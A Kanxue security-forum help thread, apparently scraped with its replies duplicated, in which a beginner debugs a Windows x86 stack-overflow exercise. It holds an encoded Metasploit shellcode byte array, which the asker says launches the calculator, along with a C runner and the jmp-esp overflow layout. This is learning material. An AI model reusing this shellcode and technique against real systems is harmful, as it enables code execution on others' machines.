[求助]新手学Windows x86 的溢出执行shellcode问题-求助问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (7)
BDBig 雪币： 634 活跃值： (1184) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 124 粉丝 67 关注私信	BDBig 2 楼你的意思是原shellcode正常？你的shellcode。。。修正过函数吗 2019-3-14 00:49 0
clayses 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	clayses 3 楼 BDBig 你的意思是原shellcode正常？你的shellcode。。。修正过函数吗 shellcode呢是用metasploit生成的。我复现的呢是 'AAAA'N+'BBBB'+JMP ESP+SHELLCODE 这种调用，然后由于后面生成的shell太大会导致shellcode被截断。就尝试着像视频那样把shellcode放在缓冲区然后把eip设置成shellcode的开头地址进行执行。就一直不行。修复函数这些我不太懂。。我就单独把shellcode独立执行了下发现是可以的代码: #include "stdio.h" #include "string.h" unsigned char shellcode[] = "\xd9\xca\xbf\x19\xde\x0e\xc3\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x1d\x3c\xfb\x3f\xf5\x42" "\x04\xc0\x05\x23\x8c\x25\x34\x63\xea\x2e\x66\x53\x78\x62\x8a" "\x18\x2c\x97\x19\x6c\xf9\x98\xaa\xdb\xdf\x97\x2b\x77\x23\xb9" "\xaf\x8a\x70\x19\x8e\x44\x85\x58\xd7\xb9\x64\x08\x80\xb6\xdb" "\xbd\xa5\x83\xe7\x36\xf5\x02\x60\xaa\x4d\x24\x41\x7d\xc6\x7f" "\x41\x7f\x0b\xf4\xc8\x67\x48\x31\x82\x1c\xba\xcd\x15\xf5\xf3" "\x2e\xb9\x38\x3c\xdd\xc3\x7d\xfa\x3e\xb6\x77\xf9\xc3\xc1\x43" "\x80\x1f\x47\x50\x22\xeb\xff\xbc\xd3\x38\x99\x37\xdf\xf5\xed" "\x10\xc3\x08\x21\x2b\xff\x81\xc4\xfc\x76\xd1\xe2\xd8\xd3\x81" "\x8b\x79\xb9\x64\xb3\x9a\x62\xd8\x11\xd0\x8e\x0d\x28\xbb\xc4" "\xd0\xbe\xc1\xaa\xd3\xc0\xc9\x9a\xbb\xf1\x42\x75\xbb\x0d\x81" "\x32\x33\x44\x88\x12\xdc\x01\x58\x27\x81\xb1\xb6\x6b\xbc\x31" "\x33\x13\x3b\x29\x36\x16\x07\xed\xaa\x6a\x18\x98\xcc\xd9\x19" "\x89\xae\xbc\x89\x51\x1f\x5b\x2a\xf3\x5f"; typedef void (__stdcall CODE) (); void RunShellCode_2() { ((void(*)(void))&shellcode)(); } void main() { RunShellCode_2(); } 2019-3-14 01:18 0
netwind 雪币： 11370 活跃值： (3386) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 4 楼你要动态调试一下，用一处指向指令jmp esp的地址覆盖返回地址，然后函数返回时esp要指向shellcode才行。上面的代码函数返回时esp是不指向shellcode的 2019-3-14 10:01 0
clayses 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	clayses 5 楼 netwind 你要动态调试一下，用一处指向指令jmp esp的地址覆盖返回地址，然后函数返回时esp要指向shellcode才行。上面的代码函数返回时esp是不指向shellcode的您可以把"\x48\xfe\x12"这段改下。有些系统不一样的shellcode头地址 2019-3-14 12:02 0
clayses 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	clayses 6 楼我调试的时候是可以正确的跳至shellcode头但是就是不知道什么问题不能弹出计算机 2019-3-14 12:03 0
不对雪币： 7104 活跃值： (3166) 能力值： ( LV4，RANK：52 ) 在线值：发帖 4 回帖 110 粉丝 30 关注私信	不对 7 楼好像C++的编译器都会自带栈值检测和栈的安全性检测，我记得好像是叫个Cookie的东西，所以，C++下想着函数溢出我不太了解，还是内联汇编吧 2019-3-14 12:04 0
clayses 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	clayses 8 楼不对好像C++的编译器都会自带栈值检测和栈的安全性检测，我记得好像是叫个Cookie的东西，所以，C++下想着函数溢出我不太了解，还是内联汇编吧应该不会吧。我的 'AAAA'*N+'BBBB'+JMP ESP+SHELLCODE 这种调用能够成功的。 2019-3-14 12:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (7)
BDBig 雪币： 634 活跃值： (1184) 能力值： ( LV4，RANK：50 ) 在线值：发帖 22 回帖 124 粉丝 67 关注私信	BDBig 2 楼你的意思是原shellcode正常？你的shellcode。。。修正过函数吗 2019-3-14 00:49 0
clayses 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	clayses 3 楼 BDBig 你的意思是原shellcode正常？你的shellcode。。。修正过函数吗 shellcode呢是用metasploit生成的。我复现的呢是 'AAAA'N+'BBBB'+JMP ESP+SHELLCODE 这种调用，然后由于后面生成的shell太大会导致shellcode被截断。就尝试着像视频那样把shellcode放在缓冲区然后把eip设置成shellcode的开头地址进行执行。就一直不行。修复函数这些我不太懂。。我就单独把shellcode独立执行了下发现是可以的代码: #include "stdio.h" #include "string.h" unsigned char shellcode[] = "\xd9\xca\xbf\x19\xde\x0e\xc3\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x1d\x3c\xfb\x3f\xf5\x42" "\x04\xc0\x05\x23\x8c\x25\x34\x63\xea\x2e\x66\x53\x78\x62\x8a" "\x18\x2c\x97\x19\x6c\xf9\x98\xaa\xdb\xdf\x97\x2b\x77\x23\xb9" "\xaf\x8a\x70\x19\x8e\x44\x85\x58\xd7\xb9\x64\x08\x80\xb6\xdb" "\xbd\xa5\x83\xe7\x36\xf5\x02\x60\xaa\x4d\x24\x41\x7d\xc6\x7f" "\x41\x7f\x0b\xf4\xc8\x67\x48\x31\x82\x1c\xba\xcd\x15\xf5\xf3" "\x2e\xb9\x38\x3c\xdd\xc3\x7d\xfa\x3e\xb6\x77\xf9\xc3\xc1\x43" "\x80\x1f\x47\x50\x22\xeb\xff\xbc\xd3\x38\x99\x37\xdf\xf5\xed" "\x10\xc3\x08\x21\x2b\xff\x81\xc4\xfc\x76\xd1\xe2\xd8\xd3\x81" "\x8b\x79\xb9\x64\xb3\x9a\x62\xd8\x11\xd0\x8e\x0d\x28\xbb\xc4" "\xd0\xbe\xc1\xaa\xd3\xc0\xc9\x9a\xbb\xf1\x42\x75\xbb\x0d\x81" "\x32\x33\x44\x88\x12\xdc\x01\x58\x27\x81\xb1\xb6\x6b\xbc\x31" "\x33\x13\x3b\x29\x36\x16\x07\xed\xaa\x6a\x18\x98\xcc\xd9\x19" "\x89\xae\xbc\x89\x51\x1f\x5b\x2a\xf3\x5f"; typedef void (__stdcall CODE) (); void RunShellCode_2() { ((void(*)(void))&shellcode)(); } void main() { RunShellCode_2(); } 2019-3-14 01:18 0
netwind 雪币： 11370 活跃值： (3386) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 4 楼你要动态调试一下，用一处指向指令jmp esp的地址覆盖返回地址，然后函数返回时esp要指向shellcode才行。上面的代码函数返回时esp是不指向shellcode的 2019-3-14 10:01 0
clayses 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	clayses 5 楼 netwind 你要动态调试一下，用一处指向指令jmp esp的地址覆盖返回地址，然后函数返回时esp要指向shellcode才行。上面的代码函数返回时esp是不指向shellcode的您可以把"\x48\xfe\x12"这段改下。有些系统不一样的shellcode头地址 2019-3-14 12:02 0
clayses 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	clayses 6 楼我调试的时候是可以正确的跳至shellcode头但是就是不知道什么问题不能弹出计算机 2019-3-14 12:03 0
不对雪币： 7104 活跃值： (3166) 能力值： ( LV4，RANK：52 ) 在线值：发帖 4 回帖 110 粉丝 30 关注私信	不对 7 楼好像C++的编译器都会自带栈值检测和栈的安全性检测，我记得好像是叫个Cookie的东西，所以，C++下想着函数溢出我不太了解，还是内联汇编吧 2019-3-14 12:04 0
clayses 雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	clayses 8 楼不对好像C++的编译器都会自带栈值检测和栈的安全性检测，我记得好像是叫个Cookie的东西，所以，C++下想着函数溢出我不太了解，还是内联汇编吧应该不会吧。我的 'AAAA'*N+'BBBB'+JMP ESP+SHELLCODE 这种调用能够成功的。 2019-3-14 12:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

未解决 [求助]新手学Windows x86 的溢出执行shellcode问题